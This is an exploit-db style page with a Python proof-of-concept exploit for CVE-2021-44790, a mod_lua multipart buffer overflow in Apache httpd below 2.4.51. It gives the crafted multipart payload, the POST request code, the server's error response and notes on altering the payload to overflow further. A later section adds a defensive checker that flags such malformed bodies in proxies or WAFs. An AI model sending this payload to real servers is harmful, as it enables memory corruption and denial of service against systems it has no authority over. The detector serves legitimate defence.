Apache 2.4.x – Buffer Overflow

  • Author: Sunil Iyengar
    Date: 2023-04-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51193/
  • # Exploit Title: Apache 2.4.x - Buffer Overflow
    # Date: Jan 2 2023
    # Exploit Author: Sunil Iyengar
    # Vendor Homepage: https://httpd.apache.org/
    # Software Link: https://archive.apache.org/dist/httpd/
    # Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51
    # Tested on: (Server) Kali, (Client) MacOS Monterey
    # CVE : CVE-2021-44790
    
    
    import requests
    
    #Example "http(s)://<hostname>/process.lua"
    url = "http(s)://<hostname>/<luafile>"
    
    payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n"
    headers = {
    'Content-Type': 'multipart/form-data; boundary=4'
    }
    
    # Note 1: The value boundary=4 in the example above is arbitrary. It can be anything else, such as 1,
    # but it has to match the boundary values used in the payload.
    
    # Note 2: The form data shown above returns the response "memory allocation error: block too big".
    # Changing the end of the payload to name=\"name\"\r\n\r\n\r\n4\r\n" avoids that error, but the lua module
    # then overflows 3 more bytes during memset.
    
    response = requests.request("POST", url, headers=headers, data=payload)
    
    print(response.text)
    
    #Response returned is
    #<h3>Error!</h3>
    #<pre>memory allocation error: block too big</pre>
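
A defender-side check for the malformed framing described in the notes above, as an added example that is not part of the original exploit or of Apache's code: it flags multipart/form-data bodies in which the declared boundary token follows a part's blank line by fewer than 8 bytes, which a well-formed RFC 2046 body never does. It assumes the receiving parser matches the raw boundary token, as the bare "4" in the payload above suggests; the function names and the third sample are constructed for illustration.

```python
import re

HEADER_END = b"\r\n\r\n"
# Smallest legal distance from the blank line ending a part's headers to the
# next boundary token: CRLFCRLF (4) plus the CRLF and "--" (4) of a delimiter.
MIN_GAP = len(HEADER_END) + len(b"\r\n--")

def boundary_from_content_type(content_type):
    """Return the declared boundary token as bytes, or None."""
    m = re.match(r'\s*multipart/form-data\s*;.*?boundary="?([^";]+)"?',
                 content_type, re.IGNORECASE)
    return m.group(1).encode("latin-1") if m else None

def undersized_parts(content_type, body):
    """Return (offset, gap) for every part whose value region is too short
    to be framed by a well-formed delimiter."""
    boundary = boundary_from_content_type(content_type)
    findings = []
    if not boundary:
        return findings
    start = body.find(boundary)
    while start != -1:
        blank = body.find(HEADER_END, start)   # end of this part's headers
        if blank == -1:
            break
        end = body.find(boundary, blank)       # next boundary token
        if end == -1:
            break
        if end - blank < MIN_GAP:
            findings.append((blank, end - blank))
        start = end
    return findings

# Constructed samples: the two bodies from the notes above and one well-formed body.
HEAD = b'Content-Disposition: form-data; name="name"\r\n\r\n'
SAMPLES = [
    ("multipart/form-data; boundary=4", b"4\r\n" + HEAD + b"0\r\n4\r\n"),
    ("multipart/form-data; boundary=4", b"4\r\n" + HEAD + b"\r\n4\r\n"),
    ("multipart/form-data; boundary=Xb9f", b"--Xb9f\r\n" + HEAD + b"0\r\n--Xb9f--\r\n"),
]

if __name__ == "__main__":
    for ctype, body in SAMPLES:
        print(ctype, undersized_parts(ctype, body) or "well-formed")
```

The check works on the raw request body, so it belongs in a proxy, WAF rule or log pipeline that sees the bytes before any multipart parser does.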